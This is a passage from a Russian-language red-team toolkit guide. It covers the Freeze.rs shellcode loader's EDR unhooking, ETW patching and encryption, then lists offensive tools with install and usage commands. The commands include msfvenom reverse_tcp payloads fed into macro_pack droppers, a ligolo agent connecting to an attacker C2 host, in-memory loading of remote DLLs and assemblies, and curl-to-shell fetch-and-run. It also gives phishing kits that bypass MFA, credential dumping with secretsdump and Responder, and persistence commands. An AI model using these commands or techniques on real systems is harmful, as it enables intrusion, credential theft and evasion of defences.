Чтобы использовать этот чистый приостановленный процесс для удаления хуков из загрузчика Freeze.rs, нам нужен способ программно найти и прочитать память чистого приостановленного процесса. Здесь на помощь приходит рандомизация адресного пространства (ASLR). ASLR — это механизм безопасности для предотвращения уязвимостей, основанных на повреждении стека памяти. ASLR рандомизирует адресное пространство внутри процесса, чтобы гарантировать уникальность всех объектов, отображаемых в память, стека, кучи и самой исполняемой программы. Вот здесь становится интересно, потому что, хотя ASLR работает, он не работает для позиционно-независимого кода, такого как DLL. Что происходит с DLL (в частности, с известными системными DLL), так это то, что адресное пространство рандомизируется один раз при загрузке. Это означает, что нам не нужно перечислять информацию удаленного процесса, чтобы найти базовый адрес его ntdll.dll, потому что он одинаков во всех процессах, включая тот, который мы контролируем. Поскольку адрес каждой DLL находится в одном и том же месте при каждой загрузке, мы можем получить эту информацию из нашего собственного процесса и никогда не перечислять приостановленный процесс для поиска адреса.

Имея эту информацию, мы можем использовать API ReadProcessMemory для чтения памяти процесса. Этот вызов API обычно ассоциируется с чтением LSASS в рамках любой атаки на учетные данные; однако сам по себе он не является вредоносным, особенно если мы просто читаем произвольный участок памяти. Единственный случай, когда ReadProcessMemory будет помечен как подозрительный, — это если вы читаете то, что не должны (например, содержимое LSASS). Продукты EDR никогда не должны помечать сам факт вызова ReadProcessMemory, так как существуют законные операционные применения этой функции, и это привело бы к множеству ложных срабатываний.
Мы можем пойти еще дальше, читая только раздел Ntdll.dll, где хранятся все системные вызовы — его раздел .text, вместо чтения всей DLL.
Объединяя эти элементы, мы можем программно получить копию раздела .text Ntdll.dll, чтобы перезаписать наш существующий перехваченный раздел .text перед выполнением шелл-кода.
**Патчинг ETW**
ETW использует встроенные системные вызовы для генерации этой телеметрии. Поскольку ETW также является встроенной функцией Windows, продуктам безопасности не нужно «перехватывать» системные вызовы ETW для доступа к информации. В результате, чтобы предотвратить ETW, Freeze.rs патчит многочисленные системные вызовы ETW, очищая регистры и возвращая поток выполнения к следующей инструкции. Патчинг ETW теперь включен по умолчанию во всех загрузчиках.
**Шелл-код**

С помощью крейта NTAPI от Rust вы можете увидеть, что все эти вызовы не отображаются в ntdll.dll, однако они все еще существуют внутри процесса.

В результате:


**Почему Rust?**
Это начиналось как забавный проект для изучения Rust и выросло в собственный фреймворк.
**Вклад**
Freeze.rs был разработан на Rust.
**Установка**
Если Rust и Rustup не установлены, пожалуйста, установите их. Если вы компилируете из OSX или Linux, убедитесь, что у вас добавлена цель "x86_64-pc-windows-gnu". Для этого выполните следующую команду:
После этого вы можете скомпилировать Freeze.rs, выполнить следующие команды или использовать скомпилированный бинарный файл:```bash
git clone https://github.com/optiv/Freeze
cd Freeze
rustup target add x86_64-pc-windows-gnu
cargo build --release
Оттуда скомпилированная версия будет находиться в target/release (заметьте, если вы не укажете --release, файл будет в target/debug/ )```bash
___________
_ /_ ____ ____ ________ ____ _______ ______
| ) _ __ _/ __ _/ __ \_ // __ \ _ __ / /
| \ | | /\ /\ / / /\ / | | /_
_ / || _ >_ >___ \___ > /\ |__| /____ >
/ / / / / / /
(@Tyl0us)
Soon they will learn that revenge is a dish... best served COLD & Rusty...
USAGE: Freeze-rs [FLAGS] [OPTIONS]
FLAGS: -c, --console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature -h, --help Prints help information -n, --noetw Disables the ETW patching that prevents ETW events from being generated. -s, --sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -V, --version Prints version information
OPTIONS: -E, --Encrypt Encrypts the shellcode using either AES 256, ELZMA or RC4 encryption -I, --Input Path to the raw 64-bit shellcode. -O, --Output Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -p, --process The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' -e, --export Defines a custom export function name for any DLL.
**Бинарный файл vs DLL**
Freeze.rs может генерировать либо .exe, либо .dll файл. Чтобы указать это, убедитесь, что параметр командной строки -O заканчивается на .exe для бинарных файлов или .dll для DLL. Другие типы файлов в настоящее время не поддерживаются. В случае DLL-файлов Freeze.rs также может добавить дополнительную функциональность экспорта. Для этого используйте параметр -export с указанием имени функции экспорта.
**Шифрование**
Шифрование шеллкода — это важный метод, используемый для защиты его от обнаружения и анализа EDR и другими средствами безопасности. Freeze.rs включает несколько методов шифрования шеллкода, в том числе AES, ELZMA и RC4.
**AES**
AES (Advanced Encryption Standard) — это симметричный алгоритм шифрования, широко используемый для шифрования данных. Freeze.rs использует размер ключа AES-256 для шифрования шеллкода. Преимущество использования AES для шифрования шеллкода заключается в том, что он обеспечивает надежное шифрование и широко поддерживается криптографическими библиотеками. Однако использование фиксированного размера блока может сделать его уязвимым для некоторых атак, таких как атака с подбором открытого текста (padding oracle attack).
**ELZMA**
ELZMA — это алгоритм сжатия и шифрования, который часто используется в вредоносном ПО для обфускации кода. Для шифрования шеллкода с помощью ELZMA шеллкод сначала сжимается алгоритмом ELZMA. Затем сжатые данные шифруются с помощью случайного ключа. Зашифрованные данные и ключ затем встраиваются в код эксплойта. Преимущество использования ELZMA для шифрования шеллкода заключается в том, что он обеспечивает как сжатие, так и шифрование в одном алгоритме. Это может помочь уменьшить размер кода эксплойта и сделать его более сложным для обнаружения.
**RC4**
RC4 — это симметричный алгоритм шифрования, который часто используется в вредоносном ПО для шифрования шеллкода. Это потоковый шифр, который может использовать ключи переменной длины и известен своей простотой и скоростью.
**Консоль**
Freeze.rs использует метод, который сначала создает процесс, а затем переносит его в фоновый режим. Это выполняет две задачи: во-первых, помогает скрыть процесс, а во-вторых, избегает обнаружения любым EDR-продуктом. Создание процесса сразу в фоновом режиме может быть очень подозрительным и являться индикатором вредоносной активности. Freeze.rs делает это, вызывая функции Windows 'GetConsoleWindow' и 'ShowWindow' после создания процесса и загрузки хуков EDR, а затем изменяет атрибуты окна на скрытые.
Если выбран параметр командной строки -console, Freeze.rs не будет скрывать процесс в фоновом режиме. Вместо этого Freeze.rs добавит несколько отладочных сообщений, отображающих, что делает загрузчик.
---
### [🔙](#tool-list)WSH
**Создание полезной нагрузки:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
Выполнить:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted
### [🔙](#tool-list)HTA
**Создание полезной нагрузки:**```html
<html>
<body>
<script>
var c = "cmd.exe";
new ActiveXObject("WScript.Shell").Run(c);
</script>
</body>
</html>
Выполнить: Запустить файл
Создание полезной нагрузки:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub
**Выполнение:** Установите функцию Auto_Open() в документе с поддержкой макросов
# Первоначальный доступ
### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)
Bash Bunny — это физический USB-инструмент для атак и многофункциональная система доставки нагрузок. Он предназначен для подключения к USB-порту компьютера и может быть запрограммирован на выполнение различных функций, включая манипуляцию и эксфильтрацию данных, установку вредоносного ПО и обход мер безопасности.
[hackinglab: Bash Bunny – Руководство](https://hackinglab.cz/en/blog/bash-bunny-guide/)
[Документация Hak5](https://docs.hak5.org/bash-bunny/)
[Репозиторий полезных нагрузок](https://github.com/hak5/bashbunny-payloads)
[Страница продукта](https://hak5.org/products/bash-bunny)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)
evilginx2 + gophish. (GoPhish) Gophish — это мощный фреймворк для фишинга с открытым исходным кодом, который позволяет легко проверить устойчивость вашей организации к фишингу. (evilginx2) Автономный фреймворк для атак типа «человек посередине», используемый для фишинга учетных данных для входа вместе с сессионными cookie, что позволяет обойти двухфакторную аутентификацию.
**Установка:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish
Использование:``` Usage: ./setup <subdomain(s)>

### [🔙](#tool-list)[Инструментарий социального инженера (SET)](https://github.com/IO1337/social-engineering-toolkit)
Эта платформа отлично подходит для создания кампаний первичного доступа. «SET имеет ряд собственных векторов атак, позволяющих быстро создать убедительную атаку».
**Установка:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install
Использование:```bash python3 setoolkit

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)
Отличный инструмент для атак брутфорса входа в систему. Может перебирать ряд сервисов, включая SSH, FTP, TELNET, HTTP и т.д.
**Установка:**```bash
sudo apt install hydra
Использование:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)
SquarePhish — это продвинутый фишинговый инструмент, использующий технику, сочетающую поток аутентификации OAuth Device Code и QR-коды (см. [PhishInSuits](https://github.com/secureworks/PhishInSuits) для получения дополнительной информации о потоке OAuth Device Code для фишинговых атак).
Этапы атаки:
- Отправка вредоносного QR-кода жертве
- Жертва сканирует QR-код с помощью мобильного устройства
- Жертва перенаправляется на сервер, контролируемый атакующим (запуск процесса потока аутентификации OAuth Device Code)
- Жертве отправляется код MFA по электронной почте (запуск 15-минутного таймера потока OAuth Device Code)
- Атакующий опрашивает систему на предмет аутентификации
- Жертва вводит код на легитимном сайте Microsoft
- Атакующий сохраняет токен аутентификации
**Установка:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt
Примечание: Перед использованием любого модуля обновите необходимую информацию в файле settings.config, отмеченную как Required. Использование (Модуль Email):```
usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]
optional arguments: -h, --help show this help message and exit
-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]
--debug enable server debugging
-e EMAIL, --email EMAIL victim email address to send initial QR code email to
**Использование (Серверный модуль):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging

King Phisher — это инструмент, позволяющий злоумышленникам создавать и отправлять фишинговые электронные письма жертвам для получения конфиденциальной информации.
Он включает такие функции, как настраиваемые шаблоны, управление кампаниями и возможность отправки писем, что делает его мощным и простым в использовании инструментом для проведения фишинговых атак. С помощью King Phisher злоумышленники могут нацеливаться на отдельных лиц или организации, используя убедительные фишинговые письма, что повышает вероятность успеха их атак.
Установка (Linux - Клиент и Сервер):```bash
wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh
**Использование:**
После установки King Phisher, пожалуйста, следуйте [wiki-странице](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started), чтобы настроить SSH, конфигурацию базы данных, SMTP-сервер и т.д.

# Выполнение
### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)
Responder — это инструмент для отравления протоколов LLMNR и NBT-NS в сети, позволяющий перехватывать учётные данные и выполнять произвольный код.
Протоколы LLMNR (Link-Local Multicast Name Resolution) и NBT-NS (NetBIOS Name Service) используются системами Windows для разрешения имён хостов в IP-адреса в локальной сети. Если имя хоста не может быть разрешено с помощью этих протоколов, система отправляет широковещательный запрос для этого имени хоста в локальную сеть.
Responder прослушивает эти широковещательные запросы и отвечает поддельным IP-адресом, заставляя запрашивающую систему отправлять свои учётные данные атакующему.
**Установка:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder
Использование:```bash
./Responder.py [options]
./Responder.py -I eth0 -wrf
Полную информацию об использовании можно найти [здесь](https://github.com/SpiderLabs/Responder#usage).

_Изображение взято с https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/_
### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)
Утилита, входящая в состав библиотеки Impacket, которая может использоваться для извлечения хэшей паролей и других секретов из системы Windows.
Это достигается путём взаимодействия с базой данных Security Account Manager (SAM) в системе и извлечения хэшированных паролей и другой информации, такой как:
- Хэши паролей для локальных учётных записей
- Билеты и ключи Kerberos
- Секреты LSA
**Установка:**```bash
python3 -m pip install impacket
Использование:```bash
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

_Изображение взято с https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy_
### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)
Evil-WinRM — это инструмент, предоставляющий интерфейс командной строки для Windows Remote Management (WinRM: _Служба, позволяющая администраторам удалённо выполнять команды на машине с Windows_).
Evil-WinRM позволяет злоумышленнику удалённо подключаться к машине с Windows через WinRM и выполнять произвольные команды.
Некоторые возможности включают:
- Загрузку в память скриптов Powershell
- Загрузку в память dll-файлов в обход некоторых антивирусов
- Загрузку x64-нагрузок
- Поддержку Pass-the-hash
- Загрузку и скачивание локальных и удалённых файлов
**Установка: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
Установка: (Ruby gem)```bash gem install evil-winrm
Альтернативные инструкции по установке можно найти [здесь](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods).
**Использование:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
# Upload local files to victim
upload local_filename
upload local_filename destination_filename
# Download remote files to local machine
download remote_filename
download remote_filename destination_filename
# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe
# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll
Полную документацию по использованию можно найти здесь.

Изображение взято с https://korbinian-spielvogel.de/posts/heist-writeup/
Инструмент для выполнения в памяти файлов VBScript, JScript, EXE, DLL и сборок dotNET. Он может использоваться для загрузки и запуска пользовательских нагрузок на целевых системах без необходимости сбрасывать файлы на диск.
Установка: (Windows)```bash git clone http://github.com/thewover/donut.git
Чтобы сгенерировать шаблон загрузчика, динамическую библиотеку donut.dll, статическую библиотеку donut.lib и генератор donut.exe. Запустите командную строку разработчика Microsoft Visual Studio x64, перейдите в каталог, куда вы клонировали репозиторий Donut, и введите следующее:```bash
nmake -f Makefile.msvc
Чтобы сделать то же самое, за исключением использования MinGW-64 на Windows или Linux, перейдите в каталог, куда вы клонировали репозиторий Donut, и введите следующее:```bash make -f Makefile.mingw
**Установка: (Linux)**```bash
pip3 install donut-shellcode
Использование:```bash
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")
Для получения полной информации об использовании см. [GitHub-страницу](https://github.com/TheWover/donut/#4-usage) инструмента donut.
Дополнительную информацию можно найти в [недавнем посте в блоге](https://thewover.github.io/Bear-Claw/) от The Wover.

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)
Инструмент, используемый для автоматизации обфускации и создания документов Office, VB-скриптов, ярлыков и других форматов для red teaming.
**Установка: (Бинарный файл)**
1. Загрузите последний бинарный файл с [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)
2. Скачайте бинарный файл на ПК с установленным оригинальным Microsoft Office.
3. Откройте консоль, выполните CD в каталог с бинарником и запустите бинарник.
**Установка: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt
Использование:```bash
python3 macro_pack.py --help
macro_pack.exe --listformats
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba
macro_pack.exe -f empire.vba -o -G myDoc.docm
echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"
echo calc.exe | macro_pack.exe --dde -G calc.xslx

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)
Набор скриптов и модулей PowerShell, которые можно использовать для достижения различных целей red teaming.
Некоторые возможности PowerSploit:
- Извлечение хешей паролей и извлечение паролей в открытом виде из памяти
- Повышение привилегий и обход средств контроля безопасности
- Выполнение произвольного кода PowerShell и обход ограничений на выполнение
- Проведение сетевой разведки и обнаружения
- Генерация полезных нагрузок и выполнение эксплойтов
**Установка:** _1. Сохранить в папку модулей PowerShell_
Сначала необходимо загрузить [папку PowerSploit](https://github.com/PowerShellMafia/PowerSploit) и сохранить её в папку модулей PowerShell.
Путь к вашей папке модулей PowerShell можно узнать с помощью следующей команды:```
$Env:PSModulePath
Установка: 2. Установите PowerSploit как модуль PowerShell
Затем вам потребуется установить модуль PowerSploit (используйте имя загруженной папки).
Примечание: Ваша политика выполнения PowerShell может заблокировать вас, для исправления выполните следующую команду.``` powershell.exe -ep bypass
Теперь вы можете установить модуль PowerSploit.```
Import-Module PowerSploit
Использование:``` Get-Command -Module PowerSploit

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)
Инструмент, который можно использовать для выполнения различных действий в средах Microsoft Active Directory (AD), таких как дамп хешей паролей, создание/удаление пользователей и изменение свойств пользователей.
Некоторые из возможностей Rubeus:
- Kerberoasting
- Атаки с золотым билетом
- Атаки с серебряным билетом
**Установка: (Скачать)**
Вы можете установить неофициальный предварительно скомпилированный бинарный файл Rubeus [здесь](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe).
**Установка: (Компиляция)**
Rubeus совместим с [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Откройте [проект .sln](https://github.com/GhostPack/Rubeus) Rubeus, выберите "Release" и выполните сборку.
**Использование:**```
Rubeus.exe -h

Отличный инструмент для проверки конечной точки жертвы на наличие уязвимостей, связанных с процессами высокого уровня целостности, группами, путями, которые могут быть перехвачены, и т.д.
Установка: (Скачать)
Вы можете установить неофициальный предварительно скомпилированный бинарный файл SharpUp здесь.
Установка: (Компиляция)
SharpUp совместим с Visual Studio 2015 Community Edition. Откройте проект .sln SharpUp, выберите "Release" и соберите.
Использование:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.
SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.
SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)
MS-SQL (Microsoft SQL Server) — это система управления реляционными базами данных, разработанная и продаваемая Microsoft.
Этот инструментарий на C# для MS-SQL предназначен для наступательной разведки и пост-эксплуатации. Подробную информацию об использовании каждого метода см. в [wiki](https://github.com/skahwah/SQLRecon/wiki).
**Установка: (Бинарный файл)**
Последнюю бинарную версию можно скачать [здесь](https://github.com/skahwah/SQLRecon/releases).
**Использование:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami
# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami
# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami
# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami
# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases
# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019
Полная информация об использовании доступна на wiki.
Информация об использовании модулей инструмента доступна здесь.

Изображение взято со страницы справки SQLRecon
Этот ресурс представляет собой сборник наиболее распространённых и известных техник обхода AppLocker.
Поскольку AppLocker может быть настроен разными способами, @api0cradle поддерживает проверенный список обходов (которые работают против правил AppLocker по умолчанию) и список возможных техник обхода (в зависимости от конфигурации) или тех, которые кто-то заявил как обход.
У них также есть список общих техник обхода, а также устаревший список методов выполнения через DLL.
Проиндексированные списки

Изображение взято с https://github.com/api0cradle/UltimateAppLockerByPassList
Лаунчер Empire на основе JavaScript и VBScript, который работает во встроенном хост-процессе PowerShell.
Оба лаунчера работают в собственном встроенном хост-процессе PowerShell, поэтому нам не нужен PowerShell.exe.
Это может быть полезно, когда компания блокирует PowerShell.exe и/или использует решение для белых списков приложений, но не блокирует выполнение JS/VBS файлов.
Использование:
Для версии JavaScript используйте следующую переменную:```javascript var EncodedPayload = "";
Для версии VBScript используйте следующую переменную:```vbscript
Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"

Изображение взято с https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html
Цель этого проекта — генерировать .html файлы, содержащие зашифрованный HTA-файл.
Идея в том, что когда ваша цель посещает страницу, ключ извлекается, и HTA динамически расшифровывается в браузере и отправляется непосредственно пользователю.
Это техника уклонения для обхода проверки содержимого/типа файлов, реализованной некоторыми средствами безопасности.
Дополнительная техническая информация здесь.
Установка:``` git clone https://github.com/nccgroup/demiguise cd demiguise
**Использование:**```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

Изображение взято с https://github.com/nccgroup/demiguise
Impacket предоставляет набор низкоуровневых привязок Python для различных сетевых протоколов, включая SMB, Kerberos и LDAP, а также библиотеки более высокого уровня для взаимодействия с сетевыми службами и выполнения определенных задач, таких как дамп хэшей паролей и создание сетевых ресурсов.
В его состав также входит ряд инструментов командной строки, которые можно использовать для выполнения различных задач, таких как дамп баз данных SAM, перечисление доверительных отношений домена и взлом паролей Windows.
Установка:```bash python3 -m pip install impacket
**Установка: (с примерами скриптов)**
Загрузите и распакуйте [пакет](https://github.com/fortra/impacket), затем перейдите в папку установки и выполните...```bash
python3 -m pip install .
Использование:```bash
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
netview.py domain/user:password -target 192.168.10.2
mssqlinstance.py 192.168.1.2
GetADUsers.py domain/user:password@IP
Отличная [шпаргалка](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) по использованию Impacket.

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)
Empire — это фреймворк для пост-эксплуатации, который позволяет генерировать полезные нагрузки для установления удалённого соединения с системами жертв.
После выполнения полезной нагрузки на системе жертвы устанавливается обратное соединение с сервером Empire, который затем можно использовать для отправки команд и контроля над целевой системой.
Empire также включает ряд встроенных модулей и скриптов, которые можно использовать для выполнения конкретных задач, таких как извлечение хэшей паролей, доступ к реестру Windows и эксфильтрация данных.
**Установка:**```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh
Использование:```bash
./empire
list agents
list listeners
Удобная [шпаргалка по использованию](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) от [HarmJoy](https://github.com/HarmJ0y).

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)
Инструментарий для сохранения постоянства (persistence) в Windows, написанный на C#.
У проекта есть [вики](https://github.com/mandiant/SharPersist/wiki).
**Установка: (Бинарник)**
Последний релиз можно найти [здесь](https://github.com/mandiant/SharPersist/releases).
**Установка: (Компиляция)**
- Скачайте файлы проекта из [репозитория GitHub](https://github.com/mandiant/SharPersist).
- Загрузите проект Visual Studio и перейдите в "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
- Перейдите в "NuGet Package Manager" --> "Package Sources"
- Добавьте источник пакетов с URL "https://api.nuget.org/v3/index.json"
- Установите пакет NuGet Costura.Fody. Требуется старая версия Costura.Fody (3.3.3), чтобы не нужно было Visual Studio 2019.
- `Install-Package Costura.Fody -Version 3.3.3`
- Установите пакет TaskScheduler
- `Install-Package TaskScheduler -Version 2.8.11`
- Теперь вы можете собрать проект самостоятельно!
**Использование:**
Полный список примеров использования можно найти [здесь](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).```
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add
#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

Ligolo-ng — это простой, легкий и быстрый инструмент, позволяющий пентестерам создавать туннели через обратное TCP/TLS-соединение с использованием интерфейса tun (без необходимости в SOCKS).
Вместо использования SOCKS-прокси или TCP/UDP-пересылок Ligolo-ng создает пользовательский сетевой стек с помощью Gvisor.
При запуске релейного/прокси-сервера используется интерфейс tun; пакеты, отправленные на этот интерфейс, преобразуются и передаются в удаленную сеть агента.
Установка: (Загрузка)
Предварительно скомпилированные бинарные файлы (Windows/Linux/macOS) доступны на странице релизов.
Установка: (Сборка)
Для сборки ligolo-ng требуется Go >= 1.17:```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go
GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go
**Настройка: (Linux)**```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
Настройка: (Windows)
Вам необходимо скачать драйвер Wintun (используемый WireGuard) и поместить wintun.dll в ту же папку, что и Ligolo (убедитесь, что вы используете правильную архитектуру).
Настройка: (Прокси-сервер)```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates
**Использование:**
_Запустите агент на целевом (жертва) компьютере (привилегии не требуются!):_```bash
./agent -connect attacker_c2_server.com:11601
Сессия должна появиться на прокси-сервере.``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
Используйте команду session, чтобы выбрать агента.```
ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
Full usage information can be found here.

Изображение взято с https://github.com/nicocha30/ligolo-ng#demo
LinPEAS — это удобный подробный инструмент повышения привилегий для поиска локальных путей повышения привилегий на конечных точках Linux.
Установка + Использование:```bash curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
WinPEAS — это удобный подробный инструмент для повышения привилегий, предназначенный для поиска локальных путей повышения привилегий на конечных точках Windows.
**Установка и использование:**```bash
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

Linux smart enumeration — это еще один хороший, менее многословный инструмент для privesc в Linux.
Установка + Использование:```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)
Certify — это инструмент на C# для перечисления и использования неправильных конфигураций в службах сертификатов Active Directory (AD CS).
Certify предназначен для использования совместно с другими инструментами и методами red team, такими как Mimikatz и PowerShell, чтобы предоставить red team возможность выполнять различные типы атак, включая атаки «человек посередине», атаки с подменой личности и атаки с повышением привилегий.
**Ключевые возможности Certify:**
- Создание сертификатов
- Подписание сертификатов
- Импорт сертификатов
- Изменение доверия к сертификатам
**Установка: (Компиляция)**
Certify совместим с [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Откройте проект Certify [.sln](https://github.com/GhostPack/Certify), выберите «Release» и выполните сборку.
**Установка: (Запуск Certify через PowerShell)**